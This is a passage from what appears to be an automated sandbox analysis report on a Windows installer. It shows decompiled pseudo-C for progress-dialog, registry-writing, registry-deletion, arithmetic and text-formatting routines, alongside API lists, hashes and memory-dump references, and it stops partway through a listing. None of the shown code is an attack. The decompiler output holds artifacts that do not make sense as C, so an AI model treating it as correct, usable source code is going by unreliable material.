                                                                                                                    • API String ID: 41195575-1993550816
                                                                                                                    • Opcode ID: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                    • Instruction ID: b5292072505f589c3e6e61736795eac3e8b5c463abbfbac9e5f2f3c06e421abf
                                                                                                                    • Opcode Fuzzy Hash: 3eee6e6f27995ada1ce6a04a907356a17faffc15d7d88bba2040e0493be19c46
                                                                                                                    • Instruction Fuzzy Hash: BE015275D00219BADB00DB94DC45BFEBBBCAB55715F10412BBB10B71C1C7B465418BA5
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402B6E, Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00402B6E(struct HWND__* _a4, intOrPtr _a8) {
				char _v68;
				int _t11;
				int _t20;

				if(_a8 == 0x110) {
					SetTimer(_a4, 1, 0xfa, 0);
					_a8 = 0x113;
				}
				if(_a8 == 0x113) {
					_t20 =  *0x40b0d8; // 0x8600
					_t11 =  *0x41f0e8;
					if(_t20 >= _t11) {
						_t20 = _t11;
					}
					wsprintfA( &_v68, "verifying installer: %d%%", MulDiv(_t20, 0x64, _t11));
					SetWindowTextA(_a4,  &_v68);
					SetDlgItemTextA(_a4, 0x406,  &_v68);
				}
				return 0;
			}






                                                                                                                    0x00402b7b
                                                                                                                    0x00402b89
                                                                                                                    0x00402b8f
                                                                                                                    0x00402b8f
                                                                                                                    0x00402b9d
                                                                                                                    0x00402b9f
                                                                                                                    0x00402ba5
                                                                                                                    0x00402bac
                                                                                                                    0x00402bae
                                                                                                                    0x00402bae
                                                                                                                    0x00402bc4
                                                                                                                    0x00402bd4
                                                                                                                    0x00402be6
                                                                                                                    0x00402be6
                                                                                                                    0x00402bee

                                                                                                                    APIs
                                                                                                                    • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402B89
                                                                                                                    • MulDiv.KERNEL32(00008600,00000064,?), ref: 00402BB4
                                                                                                                    • wsprintfA.USER32 ref: 00402BC4
                                                                                                                    • SetWindowTextA.USER32(?,?), ref: 00402BD4
                                                                                                                    • SetDlgItemTextA.USER32 ref: 00402BE6
                                                                                                                    Strings
                                                                                                                    • verifying installer: %d%%, xrefs: 00402BBE
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Text$ItemTimerWindowwsprintf
                                                                                                                    • String ID: verifying installer: %d%%
                                                                                                                    • API String ID: 1451636040-82062127
                                                                                                                    • Opcode ID: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                    • Instruction ID: c6984150c403b35497dc18a40ce28a5dc8b104db4e9527dfc76b44ca96ff41d6
                                                                                                                    • Opcode Fuzzy Hash: 82db8536561177d1b172f5ac56095865a7e50fae45f9622e7ddcc8e846317807
                                                                                                                    • Instruction Fuzzy Hash: 5D01FF70A44208BBEB209F60DD49EEE3769FB04345F008039FA06A92D1D7B5AA558F99
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402336, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 85%
                                                                                                                    			E00402336(void* __eax) {
				void* _t15;
				char* _t18;
				int _t19;
				char _t24;
				int _t27;
				intOrPtr _t35;
				void* _t37;

				_t15 = E00402B1E(__eax);
				_t35 =  *((intOrPtr*)(_t37 - 0x18));
				 *(_t37 - 0x34) =  *(_t37 - 0x14);
				 *(_t37 - 0x38) = E00402A29(2);
				_t18 = E00402A29(0x11);
				 *(_t37 - 4) = 1;
				_t19 = RegCreateKeyExA(_t15, _t18, _t27, _t27, _t27,  *0x423ff0 | 0x00000002, _t27, _t37 + 8, _t27);
				if(_t19 == 0) {
					if(_t35 == 1) {
						E00402A29(0x23);
						_t19 = lstrlenA(0x40a410) + 1;
					}
					if(_t35 == 4) {
						_t24 = E00402A0C(3);
						 *0x40a410 = _t24;
						_t19 = _t35;
					}
					if(_t35 == 3) {
						_t19 = E00402E8E( *((intOrPtr*)(_t37 - 0x1c)), _t27, 0x40a410, 0xc00);
					}
					if(RegSetValueExA( *(_t37 + 8),  *(_t37 - 0x38), _t27,  *(_t37 - 0x34), 0x40a410, _t19) == 0) {
						 *(_t37 - 4) = _t27;
					}
					_push( *(_t37 + 8));
					RegCloseKey();
				}
				 *0x423fc8 =  *0x423fc8 +  *(_t37 - 4);
				return 0;
			}










                                                                                                                    0x00402337
                                                                                                                    0x0040233c
                                                                                                                    0x00402346
                                                                                                                    0x00402350
                                                                                                                    0x00402353
                                                                                                                    0x0040236d
                                                                                                                    0x00402374
                                                                                                                    0x0040237c
                                                                                                                    0x0040238a
                                                                                                                    0x0040238e
                                                                                                                    0x00402399
                                                                                                                    0x00402399
                                                                                                                    0x0040239d
                                                                                                                    0x004023a1
                                                                                                                    0x004023a7
                                                                                                                    0x004023ac
                                                                                                                    0x004023ac
                                                                                                                    0x004023b0
                                                                                                                    0x004023bc
                                                                                                                    0x004023bc
                                                                                                                    0x004023d5
                                                                                                                    0x004023d7
                                                                                                                    0x004023d7
                                                                                                                    0x004023da
                                                                                                                    0x004024b0
                                                                                                                    0x004024b0
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    • RegCreateKeyExA.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 00402374
                                                                                                                    • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa7685.tmp,00000023,?,?,?,?,?,?,?,00000011,00000002), ref: 00402394
                                                                                                                    • RegSetValueExA.ADVAPI32(?,?,?,?,C:\Users\user\AppData\Local\Temp\nsa7685.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004023CD
                                                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nsa7685.tmp,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024B0
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseCreateValuelstrlen
                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nsa7685.tmp
                                                                                                                    • API String ID: 1356686001-2198448186
                                                                                                                    • Opcode ID: 5ccfc87406e21083559f7ddac985ae6904c0461a65219700b2570d428c2017e0
                                                                                                                    • Instruction ID: e6eb4e552242eddf296ff96e6d07a7eb6613d299afeb9756830ee7ce8f9eb162
                                                                                                                    • Opcode Fuzzy Hash: 5ccfc87406e21083559f7ddac985ae6904c0461a65219700b2570d428c2017e0
                                                                                                                    • Instruction Fuzzy Hash: 7111A271E00108BFEB10EFA5DE8DEAF7678EB40758F10443AF505B31D0C6B85D419A69
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 10001ADF, Relevance: 7.7, APIs: 5, Instructions: 190COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 97%
                                                                                                                    			E10001ADF(signed int __edx, void* __eflags, void* _a8, void* _a16) {
				signed int _v8;
				signed int _v16;
				signed int _v20;
				char _v148;
				void _t46;
				void _t47;
				signed int _t48;
				signed int _t49;
				signed int _t58;
				signed int _t59;
				signed int _t61;
				signed int _t62;
				void* _t68;
				void* _t69;
				void* _t70;
				void* _t71;
				void* _t72;
				signed int _t78;
				void* _t82;
				signed int _t86;
				signed int _t88;
				signed int _t91;
				void* _t102;

				_t86 = __edx;
				 *0x10004058 = _a8;
				_t78 = 0;
				 *0x1000405c = _a16;
				_v8 = 0;
				_a16 = E10001561();
				_a8 = E10001561();
				_t91 = E10001641(_a16);
				_t82 = _a8;
				_t88 = _t86;
				_t46 =  *_t82;
				if(_t46 != 0x7e && _t46 != 0x21) {
					_v16 = E10001561();
					_t78 = E10001641(_t75);
					_v8 = _t86;
					GlobalFree(_v16);
					_t82 = _a8;
				}
				_t47 =  *_t82;
				_t102 = _t47 - 0x2f;
				if(_t102 > 0) {
					_t48 = _t47 - 0x3c;
					__eflags = _t48;
					if(_t48 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3c;
						if( *((char*)(_t82 + 1)) != 0x3c) {
							__eflags = _t88 - _v8;
							if(__eflags > 0) {
								L54:
								_t49 = 0;
								__eflags = 0;
								L55:
								asm("cdq");
								L56:
								_t91 = _t49;
								_t88 = _t86;
								L57:
								E1000176C(_t86, _t91, _t88,  &_v148);
								E1000159E( &_v148);
								GlobalFree(_a16);
								return GlobalFree(_a8);
							}
							if(__eflags < 0) {
								L47:
								__eflags = 0;
								L48:
								_t49 = 1;
								goto L55;
							}
							__eflags = _t91 - _t78;
							if(_t91 < _t78) {
								goto L47;
							}
							goto L54;
						}
						_t86 = _t88;
						_t49 = E10002BD0(_t91, _t78, _t86);
						goto L56;
					}
					_t58 = _t48 - 1;
					__eflags = _t58;
					if(_t58 == 0) {
						__eflags = _t91 - _t78;
						if(_t91 != _t78) {
							goto L54;
						}
						__eflags = _t88 - _v8;
						if(_t88 != _v8) {
							goto L54;
						}
						goto L47;
					}
					_t59 = _t58 - 1;
					__eflags = _t59;
					if(_t59 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x3e;
						if( *((char*)(_t82 + 1)) != 0x3e) {
							__eflags = _t88 - _v8;
							if(__eflags < 0) {
								goto L54;
							}
							if(__eflags > 0) {
								goto L47;
							}
							__eflags = _t91 - _t78;
							if(_t91 <= _t78) {
								goto L54;
							}
							goto L47;
						}
						_t86 = _t88;
						_t49 = E10002BF0(_t91, _t78, _t86);
						goto L56;
					}
					_t61 = _t59 - 0x20;
					__eflags = _t61;
					if(_t61 == 0) {
						_t91 = _t91 ^ _t78;
						_t88 = _t88 ^ _v8;
						goto L57;
					}
					_t62 = _t61 - 0x1e;
					__eflags = _t62;
					if(_t62 == 0) {
						__eflags =  *((char*)(_t82 + 1)) - 0x7c;
						if( *((char*)(_t82 + 1)) != 0x7c) {
							_t91 = _t91 | _t78;
							_t88 = _t88 | _v8;
							goto L57;
						}
						__eflags = _t91 | _t88;
						if((_t91 | _t88) != 0) {
							goto L47;
						}
						__eflags = _t78 | _v8;
						if((_t78 | _v8) != 0) {
							goto L47;
						}
						goto L54;
					}
					__eflags = _t62 == 0;
					if(_t62 == 0) {
						_t91 =  !_t91;
						_t88 =  !_t88;
					}
					goto L57;
				}
				if(_t102 == 0) {
					L21:
					__eflags = _t78 | _v8;
					if((_t78 | _v8) != 0) {
						_v20 = E10002A60(_t91, _t88, _t78, _v8);
						_v16 = _t86;
						_t49 = E10002B10(_t91, _t88, _t78, _v8);
						_t82 = _a8;
					} else {
						_v20 = _v20 & 0x00000000;
						_v16 = _v16 & 0x00000000;
						_t49 = _t91;
						_t86 = _t88;
					}
					__eflags =  *_t82 - 0x2f;
					if( *_t82 != 0x2f) {
						goto L56;
					} else {
						_t91 = _v20;
						_t88 = _v16;
						goto L57;
					}
				}
				_t68 = _t47 - 0x21;
				if(_t68 == 0) {
					_t49 = 0;
					__eflags = _t91 | _t88;
					if((_t91 | _t88) != 0) {
						goto L55;
					}
					goto L48;
				}
				_t69 = _t68 - 4;
				if(_t69 == 0) {
					goto L21;
				}
				_t70 = _t69 - 1;
				if(_t70 == 0) {
					__eflags =  *((char*)(_t82 + 1)) - 0x26;
					if( *((char*)(_t82 + 1)) != 0x26) {
						_t91 = _t91 & _t78;
						_t88 = _t88 & _v8;
						goto L57;
					}
					__eflags = _t91 | _t88;
					if((_t91 | _t88) == 0) {
						goto L54;
					}
					__eflags = _t78 | _v8;
					if((_t78 | _v8) == 0) {
						goto L54;
					}
					goto L47;
				}
				_t71 = _t70 - 4;
				if(_t71 == 0) {
					_t49 = E10002A20(_t91, _t88, _t78, _v8);
					goto L56;
				} else {
					_t72 = _t71 - 1;
					if(_t72 == 0) {
						_t91 = _t91 + _t78;
						asm("adc edi, [ebp-0x4]");
					} else {
						if(_t72 == 0) {
							_t91 = _t91 - _t78;
							asm("sbb edi, [ebp-0x4]");
						}
					}
					goto L57;
				}
			}


























                                                                                                                    0x10001adf
                                                                                                                    0x10001aec
                                                                                                                    0x10001af5
                                                                                                                    0x10001af8
                                                                                                                    0x10001afd
                                                                                                                    0x10001b05
                                                                                                                    0x10001b10
                                                                                                                    0x10001b19
                                                                                                                    0x10001b1b
                                                                                                                    0x10001b1e
                                                                                                                    0x10001b20
                                                                                                                    0x10001b24
                                                                                                                    0x10001b30
                                                                                                                    0x10001b39
                                                                                                                    0x10001b3e
                                                                                                                    0x10001b41
                                                                                                                    0x10001b47
                                                                                                                    0x10001b47
                                                                                                                    0x10001b4a
                                                                                                                    0x10001b4d
                                                                                                                    0x10001b50
                                                                                                                    0x10001c16
                                                                                                                    0x10001c16
                                                                                                                    0x10001c19
                                                                                                                    0x10001c82
                                                                                                                    0x10001c86
                                                                                                                    0x10001c95
                                                                                                                    0x10001c98
                                                                                                                    0x10001ca0
                                                                                                                    0x10001ca0
                                                                                                                    0x10001ca0
                                                                                                                    0x10001ca2
                                                                                                                    0x10001ca2
                                                                                                                    0x10001ca3
                                                                                                                    0x10001ca3
                                                                                                                    0x10001ca5
                                                                                                                    0x10001ca7
                                                                                                                    0x10001cb0
                                                                                                                    0x10001cbc
                                                                                                                    0x10001ccd
                                                                                                                    0x10001cd8
                                                                                                                    0x10001cd8
                                                                                                                    0x10001c9a
                                                                                                                    0x10001c7d
                                                                                                                    0x10001c7d
                                                                                                                    0x10001c7f
                                                                                                                    0x10001c7f
                                                                                                                    0x00000000
                                                                                                                    0x10001c7f
                                                                                                                    0x10001c9c
                                                                                                                    0x10001c9e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c9e
                                                                                                                    0x10001c8a
                                                                                                                    0x10001c8e
                                                                                                                    0x00000000
                                                                                                                    0x10001c8e
                                                                                                                    0x10001c1b
                                                                                                                    0x10001c1b
                                                                                                                    0x10001c1c
                                                                                                                    0x10001c74
                                                                                                                    0x10001c76
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c78
                                                                                                                    0x10001c7b
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c7b
                                                                                                                    0x10001c1e
                                                                                                                    0x10001c1e
                                                                                                                    0x10001c1f
                                                                                                                    0x10001c54
                                                                                                                    0x10001c58
                                                                                                                    0x10001c67
                                                                                                                    0x10001c6a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c6c
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c6e
                                                                                                                    0x10001c70
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c72
                                                                                                                    0x10001c5c
                                                                                                                    0x10001c60
                                                                                                                    0x00000000
                                                                                                                    0x10001c60
                                                                                                                    0x10001c21
                                                                                                                    0x10001c21
                                                                                                                    0x10001c24
                                                                                                                    0x10001c4d
                                                                                                                    0x10001c4f
                                                                                                                    0x00000000
                                                                                                                    0x10001c4f
                                                                                                                    0x10001c26
                                                                                                                    0x10001c26
                                                                                                                    0x10001c29
                                                                                                                    0x10001c35
                                                                                                                    0x10001c39
                                                                                                                    0x10001c46
                                                                                                                    0x10001c48
                                                                                                                    0x00000000
                                                                                                                    0x10001c48
                                                                                                                    0x10001c3b
                                                                                                                    0x10001c3d
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c3f
                                                                                                                    0x10001c42
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001c44
                                                                                                                    0x10001c2c
                                                                                                                    0x10001c2d
                                                                                                                    0x10001c2f
                                                                                                                    0x10001c31
                                                                                                                    0x10001c31
                                                                                                                    0x00000000
                                                                                                                    0x10001c2d
                                                                                                                    0x10001b56
                                                                                                                    0x10001bce
                                                                                                                    0x10001bd0
                                                                                                                    0x10001bd3
                                                                                                                    0x10001bf1
                                                                                                                    0x10001bf4
                                                                                                                    0x10001bfa
                                                                                                                    0x10001bff
                                                                                                                    0x10001bd5
                                                                                                                    0x10001bd5
                                                                                                                    0x10001bd9
                                                                                                                    0x10001bdd
                                                                                                                    0x10001bdf
                                                                                                                    0x10001bdf
                                                                                                                    0x10001c02
                                                                                                                    0x10001c05
                                                                                                                    0x00000000
                                                                                                                    0x10001c0b
                                                                                                                    0x10001c0b
                                                                                                                    0x10001c0e
                                                                                                                    0x00000000
                                                                                                                    0x10001c0e
                                                                                                                    0x10001c05
                                                                                                                    0x10001b58
                                                                                                                    0x10001b5b
                                                                                                                    0x10001bbf
                                                                                                                    0x10001bc1
                                                                                                                    0x10001bc3
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001bc9
                                                                                                                    0x10001b5d
                                                                                                                    0x10001b60
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001b62
                                                                                                                    0x10001b63
                                                                                                                    0x10001b99
                                                                                                                    0x10001b9d
                                                                                                                    0x10001bb5
                                                                                                                    0x10001bb7
                                                                                                                    0x00000000
                                                                                                                    0x10001bb7
                                                                                                                    0x10001b9f
                                                                                                                    0x10001ba1
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001ba7
                                                                                                                    0x10001baa
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x10001bb0
                                                                                                                    0x10001b65
                                                                                                                    0x10001b68
                                                                                                                    0x10001b8f
                                                                                                                    0x00000000
                                                                                                                    0x10001b6a
                                                                                                                    0x10001b6a
                                                                                                                    0x10001b6b
                                                                                                                    0x10001b7f
                                                                                                                    0x10001b81
                                                                                                                    0x10001b6d
                                                                                                                    0x10001b6f
                                                                                                                    0x10001b75
                                                                                                                    0x10001b77
                                                                                                                    0x10001b77
                                                                                                                    0x10001b6f
                                                                                                                    0x00000000
                                                                                                                    0x10001b6b

                                                                                                                    APIs
                                                                                                                      • Part of subcall function 10001561: lstrcpyA.KERNEL32(00000000,?,?,?,10001804,?,10001017), ref: 1000157E
                                                                                                                      • Part of subcall function 10001561: GlobalFree.KERNEL32 ref: 1000158F
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001B41
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001CCD
                                                                                                                    • GlobalFree.KERNEL32 ref: 10001CD2
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.236719394.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.236714134.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236724294.0000000010003000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.236729631.0000000010005000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: FreeGlobal$lstrcpy
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 176019282-0
                                                                                                                    • Opcode ID: d5572105e1867ed90a5fd8c1a1141a17fe3d88b1f34ee5dafca5b024a32ddd6e
                                                                                                                    • Instruction ID: 87570af6809aa2a581422fcc871d61123a4e706d96dd3257f7c5f7ed4a9f45a4
                                                                                                                    • Opcode Fuzzy Hash: d5572105e1867ed90a5fd8c1a1141a17fe3d88b1f34ee5dafca5b024a32ddd6e
                                                                                                                    • Instruction Fuzzy Hash: 1F51F372D8415DEBFB22CFA48880EEDB7E5EF852D4FA24159E801A311DD771EE009B52
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00402A69, Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 84%
                                                                                                                    			E00402A69(void* _a4, char* _a8, intOrPtr _a12) {
				void* _v8;
				char _v272;
				long _t18;
				intOrPtr* _t27;
				long _t28;

				_t18 = RegOpenKeyExA(_a4, _a8, 0,  *0x423ff0 | 0x00000008,  &_v8);
				if(_t18 == 0) {
					while(RegEnumKeyA(_v8, 0,  &_v272, 0x105) == 0) {
						if(_a12 != 0) {
							RegCloseKey(_v8);
							L8:
							return 1;
						}
						if(E00402A69(_v8,  &_v272, 0) != 0) {
							break;
						}
					}
					RegCloseKey(_v8);
					_t27 = E00405F28(4);
					if(_t27 == 0) {
						if( *0x423ff0 != 0) {
							goto L8;
						}
						_t28 = RegDeleteKeyA(_a4, _a8);
						if(_t28 != 0) {
							goto L8;
						}
						return _t28;
					}
					return  *_t27(_a4, _a8,  *0x423ff0, 0);
				}
				return _t18;
			}








                                                                                                                    0x00402a8a
                                                                                                                    0x00402a92
                                                                                                                    0x00402aba
                                                                                                                    0x00402aa4
                                                                                                                    0x00402af4
                                                                                                                    0x00402afa
                                                                                                                    0x00000000
                                                                                                                    0x00402afc
                                                                                                                    0x00402ab8
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402ab8
                                                                                                                    0x00402acf
                                                                                                                    0x00402ad7
                                                                                                                    0x00402ade
                                                                                                                    0x00402b0a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402b12
                                                                                                                    0x00402b1a
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00402b1a
                                                                                                                    0x00000000
                                                                                                                    0x00402aed
                                                                                                                    0x00402b01

                                                                                                                    APIs
                                                                                                                    • RegOpenKeyExA.ADVAPI32(?,?,00000000,?,?), ref: 00402A8A
                                                                                                                    • RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402AC6
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402ACF
                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402AF4
                                                                                                                    • RegDeleteKeyA.ADVAPI32(?,?), ref: 00402B12
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: Close$DeleteEnumOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1912718029-0
                                                                                                                    • Opcode ID: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                    • Instruction ID: fd754328231b90d3809392cacc3778cc58b9849b8c5c25df110c081a09ace752
                                                                                                                    • Opcode Fuzzy Hash: 5d0b6e0ce49e1b9a68b8278243b858d166325889e329a7d8d46ece79ca10f327
                                                                                                                    • Instruction Fuzzy Hash: 29116D71A0000AFEDF219F90DE49DAE3B79FB14345B104076FA05A00E0DBB89E51AFA9
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00401CDE, Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 100%
                                                                                                                    			E00401CDE(int __edx) {
				void* _t17;
				struct HINSTANCE__* _t21;
				struct HWND__* _t25;
				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 8), __edx);
				GetClientRect(_t25, _t27 - 0x50);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E00402A29(_t21), _t21,  *(_t27 - 0x48) *  *(_t27 - 0x20),  *(_t27 - 0x44) *  *(_t27 - 0x20), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423fc8 =  *0x423fc8 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                    0x00401ce8
                                                                                                                    0x00401cef
                                                                                                                    0x00401d1e
                                                                                                                    0x00401d26
                                                                                                                    0x00401d2d
                                                                                                                    0x00401d2d
                                                                                                                    0x004028c1
                                                                                                                    0x004028cd

                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.233167417.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.233162094.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233190449.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233194465.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233219819.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233229304.000000000042A000.00000004.00020000.sdmp Download File
                                                                                                                    • Associated: 00000000.00000002.233240015.000000000042D000.00000002.00020000.sdmp Download File
                                                                                                                    Similarity
                                                                                                                    • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1849352358-0
                                                                                                                    • Opcode ID: c677baef4c26648a016b17c6cbe1d7ca5eca33ff03ec9b6ea06848821df726be
                                                                                                                    • Instruction ID: 6b5de524c76fb4cd20547a313357388a8ed9b6ad8842e2156e420fd608a0a23d
                                                                                                                    • Opcode Fuzzy Hash: c677baef4c26648a016b17c6cbe1d7ca5eca33ff03ec9b6ea06848821df726be
                                                                                                                    • Instruction Fuzzy Hash: 75F0EC72A04118AFD701EBA4DE88DAFB77CFB44305B14443AF501F6190C7749D019B79
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 00404649, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84stringCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E00404649(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t21;
				signed int _t22;
				void* _t29;
				void* _t31;
				void* _t32;
				void* _t41;
				signed int _t43;
				signed int _t47;
				signed int _t50;
				signed int _t51;
				signed int _t53;

				_t21 = _a16;
				_t51 = _a12;
				_t41 = 0xffffffdc;
				if(_t21 == 0) {
					_push(0x14);
					_pop(0);
					_t22 = _t51;
					if(_t51 < 0x100000) {
						_push(0xa);
						_pop(0);
						_t41 = 0xffffffdd;
					}
					if(_t51 < 0x400) {
						_t41 = 0xffffffde;
					}
					if(_t51 < 0xffff3333) {
						_t50 = 0x14;
						asm("cdq");
						_t22 = 1 / _t50 + _t51;
					}
					_t23 = _t22 & 0x00ffffff;
					_t53 = _t22 >> 0;
					_t43 = 0xa;
					_t47 = ((_t22 & 0x00ffffff) + _t23 * 4 + (_t22 & 0x00ffffff) + _t23 * 4 >> 0) % _t43;
				} else {
					_t53 = (_t21 << 0x00000020 | _t51) >> 0x14;
					_t47 = 0;
				}
				_t29 = E00405BBA(_t41, _t47, _t53,  &_v36, 0xffffffdf);
				_t31 = E00405BBA(_t41, _t47, _t53,  &_v68, _t41);
				_t32 = E00405BBA(_t41, _t47, 0x420538, 0x420538, _a8);
				wsprintfA(_t32 + lstrlenA(0x420538), "%u.%u%s%s", _t53, _t47, _t31, _t29);
				return SetDlgItemTextA( *0x423718, _a4, 0x420538);
			}



















                                                                                                                    0x0040464f
                                                                                                                    0x00404654
                                                                                                                    0x0040465c
                                                                                                                    0x0040465d
                                                                                                                    0x0040466a
                                                                                                                    0x00404672
                                                                                                                    0x00404673
                                                                                                                    0x00404675
                                                                                                                    0x00404677
                                                                                                                    0x00404679
                                                                                                                    0x0040467c
                                                                                                                    0x0040467c
                                                                                                                    0x00404683
                                                                                                                    0x00404689
                                                                                                                    0x00404689
                                                                                                                    0x00404690
                                                                                                                    0x00404697
